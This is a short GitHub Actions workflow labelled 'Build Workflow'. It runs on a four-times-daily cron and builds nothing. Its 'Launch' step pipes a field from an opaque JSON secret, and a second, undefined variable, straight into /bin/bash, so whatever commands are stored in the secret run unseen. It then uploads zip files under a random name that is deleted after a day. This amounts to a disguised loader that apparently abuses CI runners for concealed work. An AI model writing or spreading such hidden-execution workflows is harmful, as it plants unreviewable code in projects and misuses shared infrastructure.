name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '17 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          lem3: ${{ secrets.lem3 }}
        run: |
          printf '%s' "$lem3" | jq -r .i89 | /bin/bash
          echo $wl9 | jq -r .x2015 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: LaTXm7IY
          path: "*.zip"
          retention-days: 1
